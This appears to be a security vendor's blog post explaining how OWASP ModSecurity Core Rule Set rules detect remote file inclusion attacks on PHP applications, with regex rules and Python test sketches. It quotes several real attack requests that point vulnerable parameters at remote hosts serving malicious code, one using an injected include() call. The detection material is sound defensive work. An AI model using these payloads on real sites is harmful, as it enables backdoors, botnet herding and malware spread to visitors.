Remote file inclusion (RFI) is a popular technique for attacking web applications (especially PHP applications) from a remote server. RFI attacks are extremely dangerous because they allow a client to force a vulnerable application to run the attacker's malicious code by including a reference to code hosted at a URL on a remote server. When the application executes the malicious code, the result may be a backdoor or the disclosure of technical information.
There are two main application vulnerabilities that allow RFI attacks to succeed:
The two main goals for RFI attacks against web servers are:
- Botnet Herding - executing botnet code on the server so that the attacker may use the web server's resources to launch DDoS attacks
- Malware Distribution - injecting malicious JavaScript into web pages served to clients so that they become infected with malware such as the Zeus Banking Trojan.
From a defensive perspective, how do we detect RFI attacks and block them? We will walk through the various RFI detection mechanisms that we have in the OWASP ModSecurity Core Rule Set.
RFI Detection Challenges
When taking a negative security approach to RFI attacks, you could use a regular expression to search for a signature such as "(ht|f)tps?://" within parameter payloads. This initially seems like a good approach, as it would identify the beginning of a fully qualified URI. Unfortunately, it also produces many false positives for the following reasons:
- External Links/Redirects - Some request parameters are used as external links (i.e., they accept http:// as valid input) that either point back to the local host (WordPress and other apps do this) or legitimately point to a resource on a remote site.
- Free-form Text - Some "free text" request parameters are prone to false positives. In many cases these parameters contain user input (free text submitted by the user to the application); in other cases they contain large amounts of data, which may include URL links that are falsely detected as RFI attacks.
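The false-positive problem can be illustrated with a minimal Python sketch. It only approximates the naive signature with Python's `re` module and is not how ModSecurity itself evaluates rules. The "redirect" and "comment" values are hypothetical parameter contents invented for illustration; the attack value is taken from the payload samples in this post.

```python
import re

# Naive signature from the text: the start of a fully qualified URI.
NAIVE_RFI = re.compile(r"(?:ht|f)tps?://")

# Parameter values to test. "redirect" and "comment" are hypothetical,
# legitimate inputs; "attack" is an RFI payload.
samples = {
    "attack": "http://89.238.174.14/fx29id1.txt???",
    "redirect": "http://www.example.com/privmsg.php",
    "comment": "great write-up, see also https://www.owasp.org/ for details",
}

# The naive signature cannot tell the three cases apart.
flagged = {name: bool(NAIVE_RFI.search(value)) for name, value in samples.items()}

for name, hit in flagged.items():
    print(f"{name}: {'flagged' if hit else 'clean'}")
```

All three values are flagged, which is why the techniques that follow look for more specific characteristics of RFI payloads.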
Example RFI Attack Payload
Trustwave's SpiderLabs Research Team has seen numerous attack vectors (from customer logs and honeypot data samples). We will review various RFI attack payloads we have gathered and describe the detection techniques used.
URL Contains an IP Address
Most legitimate URL references specify an actual domain name or hostname, so the use of an IP address in an external link may indicate an attack. A typical attack using an IP address looks like:
GET /page.php?_PHPLIB[libdir]=http://89.238.174.14/fx29id1.txt??? HTTP/1.1
Therefore a rule for detecting such a condition should search for the pattern "(ht|f)tps?:\/\/" followed by an IP address. Here is the CRS rule:
SecRule ARGS "^(?:ht|f)tps?:\/\/(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" \
    "phase:2,rev:'2.2.2',t:none,t:htmlEntityDecode,t:lowercase,capture,ctl:auditLogParts=+E,block,status:501,msg:'Remote File Inclusion Attack',id:'950117',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.rfi_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{tx.0}"
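To experiment with this pattern outside of ModSecurity, the following Python sketch applies the same regular expression to a single parameter value. The `normalize` and `ip_url_match` helpers are hypothetical names, and `html.unescape` plus `lower()` are only a rough stand-in for the `t:htmlEntityDecode` and `t:lowercase` transformations, so treat this as an approximation rather than a faithful reimplementation of the rule.

```python
import html
import re

# Same pattern as rule 950117: a URL scheme followed by a dotted-quad address.
IP_URL = re.compile(r"^(?:ht|f)tps?://(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})")


def normalize(value: str) -> str:
    """Rough approximation of t:htmlEntityDecode followed by t:lowercase."""
    return html.unescape(value).lower()


def ip_url_match(value: str):
    """Return the IP address if the value starts with an IP-based URL, else None."""
    match = IP_URL.search(normalize(value))
    return match.group(1) if match else None


print(ip_url_match("http://89.238.174.14/fx29id1.txt???"))  # 89.238.174.14
print(ip_url_match("http://www.example.com/privmsg.php"))   # None
```

Note that `\d{1,3}` does not validate octet ranges, so a string such as `http://999.999.999.999/` also matches; for detection purposes that looseness is usually harmless.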
Use of PHP Functions
Another technique is to use internal PHP keyword functions such as "include()" to try and trick the application into including data from an external site:
GET /?id={${include("http://www.luomoeillegno.com/extras/idxx.txt??")}} HTTP/1.1
A rule for detecting such a condition should search for "include(" followed by "(ht|f)tps?:\/\/". An example ModSecurity rule to detect this is:
SecRule ARGS "(?:\binclude\s*\([^)]*(ht|f)tps?:\/\/)" \
    "phase:2,rev:'2.2.2',t:none,t:htmlEntityDecode,t:lowercase,capture,ctl:auditLogParts=+E,block,status:501,msg:'Remote File Inclusion Attack',id:'950118',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.rfi_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{tx.0}"
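The same pattern can be tried in Python against the sample payload. This is a sketch under the assumption that Python's `re` behaves like ModSecurity's regex engine for this expression; `has_include_url` is a hypothetical helper name and the benign strings are invented for illustration.

```python
import re

# Same pattern as rule 950118: "include(" followed, before any ")", by a URL scheme.
INCLUDE_URL = re.compile(r"(?:\binclude\s*\([^)]*(ht|f)tps?://)")


def has_include_url(value: str) -> bool:
    """True if the lowercased value contains include( ... http:// or similar."""
    return INCLUDE_URL.search(value.lower()) is not None


attack = '{${include("http://www.luomoeillegno.com/extras/idxx.txt??")}}'
benign = "please include the file, see http://www.example.com/docs"

print(has_include_url(attack))  # True
print(has_include_url(benign))  # False
```

Free text that happens to place a parenthesised URL right after the word "include", such as `include (http://www.example.com)`, would still match, so this rule is best treated as one signal among several.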
URLs with Trailing Question Mark(s)
Appending question marks to the end of the injected RFI payload is a common technique, somewhat similar to SQL Injection payloads that end with comment specifiers (--, ;-- or #). RFI attackers do not know what the rest of the PHP code that their payload is inserted into is supposed to do. By adding the "?" character(s), whatever the local PHP code appends after the injected URL is treated as a parameter to the included RFI code. The RFI code then simply ignores the legitimate code and executes only its own. A typical attack using trailing question marks looks like:
GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.0
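The effect of the trailing question marks can be seen by parsing the URL that the vulnerable application would end up requesting. In this Python sketch the `suffix` value is a hypothetical example of what a vulnerable script might append to the attacker-controlled parameter; it does not come from the application above.

```python
from urllib.parse import urlsplit

# Injected value from the sample request above.
injected = "http://www.miranda.gov.ve/desamiranda/libraries/export/cgi???"

# Hypothetical path that the vulnerable PHP script appends before including.
suffix = "/includes/config.php"

with_marks = urlsplit(injected + suffix)
without_marks = urlsplit(injected.rstrip("?") + suffix)

# With the question marks, the appended suffix falls into the query string,
# so the remote server is still asked for the attacker's file.
print(with_marks.path)     # /desamiranda/libraries/export/cgi
print(with_marks.query)    # ??/includes/config.php

# Without them, the suffix changes the path that gets requested.
print(without_marks.path)  # /desamiranda/libraries/export/cgi/includes/config.php
```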
A rule for detecting such an attack should search for "(ft|htt)ps?.*\?+$". An example ModSecurity rule to detect it is:
SecRule ARGS "(?:ft|htt)ps?.*\?+$" \
    "phase:2,rev:'2.2.2',t:none,t:htmlEntityDecode,t:lowercase,capture,ctl:auditLogParts=+E,block,status:501,msg:'Remote File Inclusion Attack',id:'950119',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.rfi_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{tx.0}"
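A quick way to get a feel for this pattern is to run it over a few values in Python. This is a sketch only: `ends_with_question_mark` is a hypothetical helper name, and the benign strings are invented for illustration.

```python
import re

# Same pattern as rule 950119: a URL scheme, anything, then trailing "?" characters.
TRAILING_QMARK = re.compile(r"(?:ft|htt)ps?.*\?+$")


def ends_with_question_mark(value: str) -> bool:
    """True if the lowercased value contains a scheme and ends in one or more '?'."""
    return TRAILING_QMARK.search(value.lower()) is not None


attack = "http://www.miranda.gov.ve/desamiranda/libraries/export/cgi???"

print(ends_with_question_mark(attack))                                 # True
print(ends_with_question_mark("http://www.example.com/search?q=rfi"))  # False
print(ends_with_question_mark("does the site support https?"))         # True
```

The last line shows that, because the pattern does not require "://", a free-text question ending in "https?" also matches. This is one reason to use the rule as a contributor to an anomaly score rather than as a standalone block.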
Off-site URLs
One other technique that can be used to detect potential RFI attacks (when the application never legitimately references files offsite) is to inspect the domain name/hostname specified within the parameter payload and compare it to the Host header submitted in the request. If the two match, fully qualified references back to the local site are allowed, while offsite references are denied.
For example, the following legitimate request would be allowed as the hostnames match:
GET /login.php?redirect=http://www.example.com/privmsg.php&folder=inbox&sid=cc5b71d6f45d94c636e94c27a2942e62 HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
An RFI attack, however, would have a mismatch between the URL domain and the Host header:
GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://bio.as.nhcue.edu.tw//Bio1/language/lang.txt??? HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
An example ModSecurity rule to detect it is:
SecRule ARGS "^(?:ht|f)tps?://(.*)\?$" \
    "chain,phase:2,rev:'2.2.2',t:none,t:htmlEntityDecode,t:lowercase,capture,ctl:auditLogParts=+E,block,status:501,msg:'Remote File Inclusion Attack',id:'950120',severity:'2'"
    SecRule TX:1 "!@beginsWith %{request_headers.host}" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.rfi_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{tx.1}"
This rule initially searches for "^(?:ht|f)tps?://(.*)\?$", which is a URL with a trailing question mark. It then captures everything between the scheme and the final question mark, beginning with the hostname, in the second set of parentheses (the first set is non-capturing, so this is capture group 1, stored in TX:1). The second part of the rule compares the saved capture data with the macro-expanded Host header from the request. If the captured data does not begin with the Host value (meaning the URL is off-site), then the rule matches.
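The two-step logic of the chained rule can be sketched in Python as follows. The function name `is_offsite_rfi` is hypothetical, `html.unescape` and `lower()` only approximate the ModSecurity transformations, and lowercasing the Host header is an assumption added by this sketch rather than something the rule itself does.

```python
import html
import re

# Step 1 of the chain: a URL with a trailing question mark; group 1 holds
# everything between the scheme and the final "?".
URL_WITH_TRAILING_Q = re.compile(r"^(?:ht|f)tps?://(.*)\?$")


def is_offsite_rfi(value: str, host_header: str) -> bool:
    """Approximate rule 950120: flag URLs whose host part differs from Host."""
    match = URL_WITH_TRAILING_Q.search(html.unescape(value).lower())
    if match is None:
        return False  # first rule in the chain did not match
    # Step 2 of the chain: "!@beginsWith %{request_headers.host}".
    # Lowercasing the header is an assumption of this sketch.
    return not match.group(1).startswith(host_header.lower())


host = "www.example.com"
print(is_offsite_rfi("http://bio.as.nhcue.edu.tw//Bio1/language/lang.txt???", host))  # True
print(is_offsite_rfi("http://www.example.com/privmsg.php?", host))                    # False
print(is_offsite_rfi("http://www.example.com/privmsg.php", host))                     # False
```

Because the comparison is a simple prefix check, a value such as `http://www.example.com.attacker.example/x?` would not be flagged, so this check works best alongside the other rules.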
Conclusion
These generic RFI rules could be used individually or collaboratively in an anomaly scoring scenario to help identify these types of attacks. Keep an eye out for more additions to the OWASP CRS for detecting RFI attacks. If you have any other detection techniques, let us know.